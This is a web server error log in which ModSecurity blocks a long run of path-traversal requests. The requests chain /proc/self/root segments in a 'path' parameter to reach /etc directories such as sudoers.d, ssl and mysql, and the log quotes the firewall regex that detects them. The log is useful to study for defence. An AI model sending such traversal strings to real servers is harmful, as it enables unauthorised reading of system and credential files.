https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:33:07.549291 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:60602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzU-oXxyEfFpUF8f8oDwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:33:11.087277 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:38874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzVuoXxyEfFpUF8f8oEwAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:33:18.118684 2026] [proxy_fcgi:error] [pid 7545:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34942] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:33:18.522566 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:38880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzXvu8EFLIOrSqIpvESQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:33:27.743244 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:38880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzZ_u8EFLIOrSqIpvETgAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:33:28.273500 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:38880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzaPu8EFLIOrSqIpvETwAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:33:33.700132 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:48950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzbcdf6f5d65gmYZSV9wAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:33:41.135229 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35600] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:33:41.475248 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:48248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzdeoXxyEfFpUF8f8oJgAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:33:47.907362 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.243.128:48250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwze_-YZRR_7pZ7nDKnHAAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:33:57.718533 2026] [mime_magic:error] [pid 7893:tid 140411632822016] (70014)End of file found: [client 57.141.18.97:39380] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:34:04.137782 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:36262] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:34:04.767363 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.241.31:47010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzjP-YZRR_7pZ7nDKnJAAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:34:06.503667 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:44114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzjuoXxyEfFpUF8f8oNAAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:34:14.237476 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:52216] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzlMdf6f5d65gmYZSWFwAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:34:14.252938 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.243.128:52122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzkwbLMZ6AikZjR9V5NQAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:34:16.334699 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:52134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzmAkwaGbbGflqUZDlUQAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:34:18.984087 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:52228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzmgkwaGbbGflqUZDlUwAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:34:23.475360 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:52140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzn_u8EFLIOrSqIpvEbgAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:34:25.107635 2026] [proxy_fcgi:error] [pid 7893:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36824] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:34:28.044757 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:46092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzpAkwaGbbGflqUZDlVgAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:34:30.360121 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.241.31:56706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzpgbLMZ6AikZjR9V5QQAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:34:36.175477 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:44900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzrAkwaGbbGflqUZDlWwAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:34:38.281008 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:44908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzrvqxLDW4GITHUkSEbQAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:34:40.120163 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:58498] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzr9a6ubjKNq_cu4ZyegAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:34:40.744606 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.243.128:42770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzsAbLMZ6AikZjR9V5QgAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
